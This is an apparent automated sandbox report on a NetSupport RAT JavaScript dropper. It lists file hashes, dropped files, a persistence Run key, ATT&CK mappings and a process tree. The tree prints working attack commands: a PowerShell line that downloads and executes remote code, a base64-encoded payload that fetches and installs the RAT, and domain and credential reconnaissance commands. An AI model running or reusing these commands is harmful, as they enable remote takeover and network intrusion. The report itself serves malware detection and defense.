netsupport | c6a6520a8d9d4ada3c4c23ca97fe954be793f4eda9dc3b6e28d9588fa6051a98

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
01-03-2024 16:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

I_190941909419094SH_19094.js
Size

53KB
MD5

e03e92ac8fb4660b37306d2e3054ff7b
SHA1

2e1d74fcceb08bac9f1498e99c5a2a3c30a93701
SHA256

c6a6520a8d9d4ada3c4c23ca97fe954be793f4eda9dc3b6e28d9588fa6051a98
SHA512

07d89001bff59317bd0121f37f77fde7a1ad0bb914e050f3212e7840cd75f6a2c1013b521322e3a5d1b73ae3218fc19fc455ea30140c1ee21c303df675b294b0
SSDEEP

1536:Dy9WbpDiixx/hEn/+4wSlbl4scxwBJvO4TIWBC:DDBR/unwS5l4scqtPTLM

Score

10^/10

netsupport persistence rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://hotelashrafee.com/rem.txt

Extracted

Language

ps1

Source

URLs

exe.dropper

http://leadingbyte.com/e6a85777-d353-412d-acaf-b017744de8b8c.txt

Signatures

NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
rat netsupport

Blocklisted process makes network request 2 IoCs

flow	pid	Process
29	2304	powershell.exe
31	4332	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Control Panel\International\Geo\Nation	wscript.exe

Executes dropped EXE 2 IoCs

pid	Process
2656	client32.exe
632	remcmdstub.exe

Loads dropped DLL 6 IoCs

pid	Process
2656	client32.exe
2656	client32.exe
2656	client32.exe
2656	client32.exe
2656	client32.exe
2656	client32.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HostingInfo_0103 = "C:\\ProgramData\\HostingInfo_0103\\client32.exe"	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Runs net.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
2304	powershell.exe
2304	powershell.exe
4332	powershell.exe
4332	powershell.exe
3336	powershell.exe
3336	powershell.exe
4680	powershell.exe
4680	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2304	powershell.exe
Token: SeDebugPrivilege	4332	powershell.exe
Token: SeSecurityPrivilege	2656	client32.exe
Token: SeIncreaseQuotaPrivilege	2380	WMIC.exe
Token: SeSecurityPrivilege	2380	WMIC.exe
Token: SeTakeOwnershipPrivilege	2380	WMIC.exe
Token: SeLoadDriverPrivilege	2380	WMIC.exe
Token: SeSystemProfilePrivilege	2380	WMIC.exe
Token: SeSystemtimePrivilege	2380	WMIC.exe
Token: SeProfSingleProcessPrivilege	2380	WMIC.exe
Token: SeIncBasePriorityPrivilege	2380	WMIC.exe
Token: SeCreatePagefilePrivilege	2380	WMIC.exe
Token: SeBackupPrivilege	2380	WMIC.exe
Token: SeRestorePrivilege	2380	WMIC.exe
Token: SeShutdownPrivilege	2380	WMIC.exe
Token: SeDebugPrivilege	2380	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2380	WMIC.exe
Token: SeRemoteShutdownPrivilege	2380	WMIC.exe
Token: SeUndockPrivilege	2380	WMIC.exe
Token: SeManageVolumePrivilege	2380	WMIC.exe
Token: 33	2380	WMIC.exe
Token: 34	2380	WMIC.exe
Token: 35	2380	WMIC.exe
Token: 36	2380	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2380	WMIC.exe
Token: SeSecurityPrivilege	2380	WMIC.exe
Token: SeTakeOwnershipPrivilege	2380	WMIC.exe
Token: SeLoadDriverPrivilege	2380	WMIC.exe
Token: SeSystemProfilePrivilege	2380	WMIC.exe
Token: SeSystemtimePrivilege	2380	WMIC.exe
Token: SeProfSingleProcessPrivilege	2380	WMIC.exe
Token: SeIncBasePriorityPrivilege	2380	WMIC.exe
Token: SeCreatePagefilePrivilege	2380	WMIC.exe
Token: SeBackupPrivilege	2380	WMIC.exe
Token: SeRestorePrivilege	2380	WMIC.exe
Token: SeShutdownPrivilege	2380	WMIC.exe
Token: SeDebugPrivilege	2380	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2380	WMIC.exe
Token: SeRemoteShutdownPrivilege	2380	WMIC.exe
Token: SeUndockPrivilege	2380	WMIC.exe
Token: SeManageVolumePrivilege	2380	WMIC.exe
Token: 33	2380	WMIC.exe
Token: 34	2380	WMIC.exe
Token: 35	2380	WMIC.exe
Token: 36	2380	WMIC.exe
Token: SeDebugPrivilege	1808	whoami.exe
Token: SeDebugPrivilege	1808	whoami.exe
Token: SeDebugPrivilege	1808	whoami.exe
Token: SeDebugPrivilege	1808	whoami.exe
Token: SeDebugPrivilege	1808	whoami.exe
Token: SeDebugPrivilege	1808	whoami.exe
Token: SeDebugPrivilege	1808	whoami.exe
Token: SeDebugPrivilege	1808	whoami.exe
Token: SeDebugPrivilege	1808	whoami.exe
Token: SeDebugPrivilege	1808	whoami.exe
Token: SeDebugPrivilege	1808	whoami.exe
Token: SeDebugPrivilege	1808	whoami.exe
Token: SeDebugPrivilege	1808	whoami.exe
Token: SeDebugPrivilege	1808	whoami.exe
Token: SeDebugPrivilege	1808	whoami.exe
Token: SeDebugPrivilege	1808	whoami.exe
Token: SeDebugPrivilege	1808	whoami.exe
Token: SeDebugPrivilege	1808	whoami.exe
Token: SeDebugPrivilege	1808	whoami.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2656	client32.exe

Suspicious use of WriteProcessMemory 30 IoCs

description	pid	Process	procid_target
PID 3532 wrote to memory of 2304	3532	wscript.exe	92
PID 3532 wrote to memory of 2304	3532	wscript.exe	92
PID 2304 wrote to memory of 4332	2304	powershell.exe	94
PID 2304 wrote to memory of 4332	2304	powershell.exe	94
PID 4332 wrote to memory of 2656	4332	powershell.exe	95
PID 4332 wrote to memory of 2656	4332	powershell.exe	95
PID 4332 wrote to memory of 2656	4332	powershell.exe	95
PID 2656 wrote to memory of 632	2656	client32.exe	99
PID 2656 wrote to memory of 632	2656	client32.exe	99
PID 2656 wrote to memory of 632	2656	client32.exe	99
PID 632 wrote to memory of 1704	632	remcmdstub.exe	101
PID 632 wrote to memory of 1704	632	remcmdstub.exe	101
PID 1704 wrote to memory of 1752	1704	cmd.exe	102
PID 1704 wrote to memory of 1752	1704	cmd.exe	102
PID 1704 wrote to memory of 4216	1704	cmd.exe	103
PID 1704 wrote to memory of 4216	1704	cmd.exe	103
PID 1704 wrote to memory of 1240	1704	cmd.exe	104
PID 1704 wrote to memory of 1240	1704	cmd.exe	104
PID 1704 wrote to memory of 4352	1704	cmd.exe	105
PID 1704 wrote to memory of 4352	1704	cmd.exe	105
PID 1704 wrote to memory of 2380	1704	cmd.exe	106
PID 1704 wrote to memory of 2380	1704	cmd.exe	106
PID 1704 wrote to memory of 1808	1704	cmd.exe	107
PID 1704 wrote to memory of 1808	1704	cmd.exe	107
PID 1704 wrote to memory of 3336	1704	cmd.exe	108
PID 1704 wrote to memory of 3336	1704	cmd.exe	108
PID 1704 wrote to memory of 4680	1704	cmd.exe	109
PID 1704 wrote to memory of 4680	1704	cmd.exe	109
PID 1704 wrote to memory of 4832	1704	cmd.exe	110
PID 1704 wrote to memory of 4832	1704	cmd.exe	110

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\I_190941909419094SH_19094.js
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3532
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://hotelashrafee.com/rem.txt')"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2304
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -EXeCuTiONPoL bypAss -W h -E UwBFAHQALQBsAG8AYwBhAFQAaQBvAG4AIAAkAGUATgBWADoAcABSAG8AZwBSAGEATQBEAEEAVABhADsAIAAkAHQANABzAHAAegBrAG8APQBbAGIAeQB0AGUAWwBdAF0AQAAoADgAMAAsACAANwA1ACwAIAAzACwAIAA0ACkAOwAgACQAZQAzAEYAVgBWAFAAPQAnAGgAdAB0AHAAOgAvAC8AbABlAGEAZABpAG4AZwBiAHkAdABlAC4AYwBvAG0ALwBlADYAYQA4ADUANwA3ADcALQBkADMANQAzAC0ANAAxADIAZAAtAGEAYwBhAGYALQBiADAAMQA3ADcANAA0AGQAZQA4AGIAOABjAC4AdAB4AHQAJwA7ACAAJABNAG8AQgB1AFAASgB1AD0AJwA3AHkAWQB2ADEALgB6AGkAcAAnADsAIAAkAHgARgAxAFUARAA9ACcASABvAHMAdABpAG4AZwBJAG4AZgBvAF8AMAAxADAAMwAnADsAIAAkAEEAMQBkAHkAYwBoAEcAYwA9AEkAbgB2AG8ASwBlAC0AVwBlAEIAcgBlAHEAdQBlAHMAVAAgAC0AVQBSAGkAIAAkAGUAMwBGAFYAVgBQACAALQBVAHMARQBCAGEAUwBJAEMAUABBAHIAcwBpAG4ARwA7ACAAJABZADMANwA5AFMAPQAkAEEAMQBkAHkAYwBoAEcAYwAuAEMATwBuAHQAZQBuAHQAOwAgACQAcQBtADQAWgBYAHYAZgA9ACIAewAwAH0AXAB7ADEAfQAiACAALQBmACAAJABlAE4AVgA6AHAAUgBvAGcAUgBhAE0ARABBAFQAYQAsACAAJAB4AEYAMQBVAEQAOwAgACQAOABpADcANABDAFAAVgBoAD0AagBPAEkAbgAtAHAAQQBUAGgAIAAtAHAAQQB0AEgAIAAkAGUATgBWADoAcABSAG8AZwBSAGEATQBEAEEAVABhACAALQBjAGgAaQBMAEQAcABhAFQAaAAgACQATQBvAEIAdQBQAEoAdQA7ACAAJABPAE8AYQBzADIAPQBbAEMATwBOAHYAZQByAHQAXQA6ADoAZgBSAG8ATQBCAEEAcwBFADYANABTAHQAUgBJAE4AZwAoACQAWQAzADcAOQBTACkAOwAgACQAOQBQAGYARQBsAHkAPQAkAE8ATwBhAHMAMgAgAC0AUwBwAEwAaQB0ACAAJwAgACcAIAAtAEEAUwAgAFsAQgB5AFQAZQBbAF0AXQA7ACAAJABXAE4ANABzAHoAQwA9ACQAdAA0AHMAcAB6AGsAbwArACQAOQBQAGYARQBsAHkAOwAgAFMARQBUAC0AQwBPAG4AVABFAE4AdAAgACQATQBvAEIAdQBQAEoAdQAgACQAVwBOADQAcwB6AEMAIAAtAGUAbgBDAG8ARABpAE4ARwAgAGIAWQBUAEUAOwAgAEUAWABwAEEAbgBEAC0AYQByAEMASABpAFYAZQAgAC0AUABBAFQAaAAgACQAOABpADcANABDAFAAVgBoACAALQBkAGUAcwB0AEkATgBBAFQAaQBPAG4AUABBAFQASAAgACQAcQBtADQAWgBYAHYAZgAgAC0ARgBvAFIAYwBFADsAIABSAG0AIAAkAE0AbwBCAHUAUABKAHUAOwAgAFMAZQBUAC0ATABPAGMAQQBUAGkAbwBuACAAJABxAG0ANABaAFgAdgBmADsAIAAkAEoAQgB1AEcAcABzAD0AIgB7ADAAfQBcAGMAbABpAGUAbgB0ADMAMgAuAGUAeABlACIAIAAtAGYAIAAkAHEAbQA0AFoAWAB2AGYAOwAgAHMAdABhAHIAdAAgAGMAbABpAGUAbgB0ADMAMgAuAGUAeABlADsAIABuAEUAdwAtAGkAdABFAG0AcAByAG8AUABFAFIAdABZACAALQBQAEEAVABIACAAJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgAnACAALQBOAEEAbQBFACAAJAB4AEYAMQBVAEQAIAAtAHYAQQBsAHUARQAgACQASgBCAHUARwBwAHMAIAAtAFAAcgBvAHAAZQBSAHQAWQB0AHkAcABlACAAJwBTAHQAcgBpAG4AZwAnADsA
    3⤵
    - Blocklisted process makes network request
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4332
  - - C:\ProgramData\HostingInfo_0103\client32.exe
      "C:\ProgramData\HostingInfo_0103\client32.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:2656
    - - C:\ProgramData\HostingInfo_0103\remcmdstub.exe
        
        remcmdstub.exe 2336 2356 2368 2372 %COMSPEC%
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:632
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1704
        
        C:\Windows\system32\cmdkey.exe
        
        cmdkey /l
        7⤵
        
        PID:1752
        
        C:\Windows\system32\net.exe
        
        net use
        7⤵
        
        PID:4216
        
        C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Microsoft\Terminal Server Client\Servers" /s
        7⤵
        
        PID:1240
        
        C:\Windows\system32\quser.exe
        
        quser
        7⤵
        
        PID:4352
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState /Format:List
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2380
        
        C:\Windows\system32\whoami.exe
        
        whoami /all
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1808
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -c "$i=0;$D=[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain();$L='LDAP://'.$D;$D = [ADSI]$L;$Date = $((Get-Date).AddDays(-90).ToFileTime());$str = '(&(objectcategory=computer)(operatingSystem=*serv*)(|(lastlogon>='+$Date+')(lastlogontimestamp>='+$Date+')))';$s = [adsisearcher]$str;$s.searchRoot = $L.$D.distinguishedName;$s.PropertiesToLoad.Add('cn') > $Null;$s.PropertiesToLoad.Add('operatingsystem') > $Null;$s.PropertiesToLoad.Add('description') > $Null;$s.PropertiesToLoad.Add('distinguishedName') > $Null;Foreach ($CA in $s.FindAll()){;Write-Host $CA.Properties.Item('cn'); $CA.Properties.Item('operatingsystem'); $CA.Properties.Item('description'); $CA.Properties.Item('distinguishedName'); $i++;}; Write-host Total servers: $i"
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3336
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -c "$D=[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain();$L='LDAP://'.$D;$D = [ADSI]$L;$Date = $((Get-Date).AddDays(-90).ToFileTime());$str = '(&(objectcategory=computer)(|(lastlogon>='+$Date+')(lastlogontimestamp>='+$Date+')))';$s = [adsisearcher]$str;$s.searchRoot = $L.$D.distinguishedName;$s.PageSize = 10000;$s.PropertiesToLoad.Add('cn') > $Null;Foreach ($CA in $s.FindAll()){;$i++;}; Write-Output Total computers: $i`n`n"
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4680
        
        C:\Windows\system32\nltest.exe
        
        nltest /domain_trusts
        7⤵
        
        PID:4832

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\HostingInfo_0103\HTCTL32.DLL

Filesize
320KB

MD5
2d3b207c8a48148296156e5725426c7f

SHA1
ad464eb7cf5c19c8a443ab5b590440b32dbc618f

SHA256
edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796

SHA512
55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c

Download Submit
C:\ProgramData\HostingInfo_0103\NSM.LIC

Filesize
259B

MD5
866c96ba2823ac5fe70130dfaaa08531

SHA1
892a656da1ea264c73082da8c6e5f5728abcb861

SHA256
6a7c99e4bd767433c25d6df8df81baa99c05dd24fa064e45c306ff4d954e1921

SHA512
0dafc66222bbfcb1558d9845ee4ddeb7a687561b08b86a07b66b120c22952a8082e041d9234d9c69c8ade5d4dae894d3f10afd7ba6dd3f057a08fb5d57c42112

Download Submit
C:\ProgramData\HostingInfo_0103\PCICHEK.DLL

Filesize
18KB

MD5
a0b9388c5f18e27266a31f8c5765b263

SHA1
906f7e94f841d464d4da144f7c858fa2160e36db

SHA256
313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a

SHA512
6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd

Download Submit
C:\ProgramData\HostingInfo_0103\PCICL32.dll

Filesize
3.3MB

MD5
916c03d8fc0c1fd211c254737dff1055

SHA1
948ee4fbae7ce9dc7a37ccaca75341876bbf5d70

SHA256
250e8bbec081ae5e65b669da92652af6d4266db816c8705fbc9be84707914d99

SHA512
ad18049763a0c289f80c0efa21fbe2a44d0d3f4b5f3686ed9be7562e5c9c68f932a8047377e3a5a8a2a6f09046bb12eadf8b6d3b99dfaa81650fa633ccee1050

Download Submit
C:\ProgramData\HostingInfo_0103\client32.exe

Filesize
117KB

MD5
a2b46c59f6e7e395d479b09464ecdba0

SHA1
92c132307dd21189b6d7912ddd934b50e50d1ec1

SHA256
89f0c8f170fe9ea28b1056517160e92e2d7d4e8aa81f4ed696932230413a6ce1

SHA512
4f4479ddcd9d0986aec3d789f9e14f9285e8d9d63a5b8f73c9e3203d3a53cd575b1e15edf0d5f640816bb7f25bd3501244e0f7c181a716a6804742ed2f1cf916

Download Submit
C:\ProgramData\HostingInfo_0103\client32.ini

Filesize
638B

MD5
5a017da03df76f4e2077fd2c4a115b1b

SHA1
2a79863853d4caa243571c0055c228e079d82339

SHA256
1a4a43c52c289f6f56cbfa56256cff5e9adfd3e78097a94ed4b69490b8c5469d

SHA512
580483c8a6c05dba738a4939e6740ed7698ab7efe54da6db8af273fe7507944b63e562377837ad110d0d645293ea7178fca64fecb197688d614d83854f172f02

Download Submit
C:\ProgramData\HostingInfo_0103\msvcr100.dll

Filesize
755KB

MD5
0e37fbfa79d349d672456923ec5fbbe3

SHA1
4e880fc7625ccf8d9ca799d5b94ce2b1e7597335

SHA256
8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18

SHA512
2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

Download Submit
C:\ProgramData\HostingInfo_0103\pcicapi.dll

Filesize
32KB

MD5
dcde2248d19c778a41aa165866dd52d0

SHA1
7ec84be84fe23f0b0093b647538737e1f19ebb03

SHA256
9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917

SHA512
c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166

Download Submit
C:\ProgramData\HostingInfo_0103\remcmdstub.exe

Filesize
58KB

MD5
ba2a1815e16b357eeff23b8394457aa5

SHA1
2492e2393cdaed5678ea0a573c50d06ec5f191f4

SHA256
e14c3224215ea91587e96b995861e8966166dfc08ab4d409bd729770815b3b81

SHA512
d505a1a17c44a96e74f94238b3623d7e6064b8c94007f2d94d6626eeee3ba75db92e569bc864c90096eabf61a0cd68ae690461b43b6e429b4deda1b44e18ba41

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
512c6cab650bfda6ef2995f6b515ed6f

SHA1
fec40abf4f5d74ea7f8828cee83770e423203083

SHA256
84871d83ecd410fb4ddede63061d9c521d876d47a8ffdbb8609378447ba0d262

SHA512
638fffef25de1c3e850eb4f4668c4fdafed7bde042b130325daf323b45d2784916381b410219473b5bbacb4c11c6b8b7ab892b3d5695edb0b0a0785233e8e19b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
3f21fa8990c59f53e99ba28afff8a6a9

SHA1
65a1ff274bc23344402296bab11807daaba3ec08

SHA256
eefe8742919fa081cc87ada458f6242c82592126003f87ffc7cbfb4c70efb5f3

SHA512
e67977ea37fe9d69946b4af97501a899b8547a28aa7a87374305d153e0a34b791044c39f15898e9c0fc77cfa5ddd91d30b393edbc04d8d2b24dfab8a4b7b515d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0f6a3762a04bbb03336fb66a040afb97

SHA1
0a0495c79f3c8f4cb349d82870ad9f98fbbaac74

SHA256
36e2fac0ab8aee32e193491c5d3df9374205e328a74de5648e7677eae7e1b383

SHA512
cc9ebc020ec18013f8ab4d6ca5a626d54db84f8dc2d97e538e33bb9a673344a670a2580346775012c85f204472f7f4dd25a34e59f1b827642a21db3325424b69

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_montx03w.ys3.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/2304-12-0x000001C762350000-0x000001C762360000-memory.dmp

Filesize
64KB

Download
memory/2304-86-0x00007FFB3F1C0000-0x00007FFB3FC81000-memory.dmp

Filesize
10.8MB

Download
memory/2304-11-0x000001C762350000-0x000001C762360000-memory.dmp

Filesize
64KB

Download
memory/2304-10-0x00007FFB3F1C0000-0x00007FFB3FC81000-memory.dmp

Filesize
10.8MB

Download
memory/2304-5-0x000001C762320000-0x000001C762342000-memory.dmp

Filesize
136KB

Download
memory/3336-100-0x00007FFB3F1C0000-0x00007FFB3FC81000-memory.dmp

Filesize
10.8MB

Download
memory/3336-101-0x000002A2DE960000-0x000002A2DE970000-memory.dmp

Filesize
64KB

Download
memory/3336-104-0x00007FFB3F1C0000-0x00007FFB3FC81000-memory.dmp

Filesize
10.8MB

Download
memory/3336-102-0x000002A2DE960000-0x000002A2DE970000-memory.dmp

Filesize
64KB

Download
memory/4332-26-0x000001CE270D0000-0x000001CE270E0000-memory.dmp

Filesize
64KB

Download
memory/4332-24-0x000001CE270D0000-0x000001CE270E0000-memory.dmp

Filesize
64KB

Download
memory/4332-23-0x000001CE270D0000-0x000001CE270E0000-memory.dmp

Filesize
64KB

Download
memory/4332-76-0x00007FFB3F1C0000-0x00007FFB3FC81000-memory.dmp

Filesize
10.8MB

Download
memory/4332-27-0x000001CE296A0000-0x000001CE296B2000-memory.dmp

Filesize
72KB

Download
memory/4332-28-0x000001CE29680000-0x000001CE2968A000-memory.dmp

Filesize
40KB

Download
memory/4332-22-0x00007FFB3F1C0000-0x00007FFB3FC81000-memory.dmp

Filesize
10.8MB

Download
memory/4680-105-0x00007FFB3F1C0000-0x00007FFB3FC81000-memory.dmp

Filesize
10.8MB

Download
memory/4680-106-0x000001A40DE60000-0x000001A40DE70000-memory.dmp

Filesize
64KB

Download
memory/4680-107-0x000001A40DE60000-0x000001A40DE70000-memory.dmp

Filesize
64KB

Download
memory/4680-118-0x000001A40DE60000-0x000001A40DE70000-memory.dmp

Filesize
64KB

Download
memory/4680-120-0x00007FFB3F1C0000-0x00007FFB3FC81000-memory.dmp

Filesize
10.8MB

Download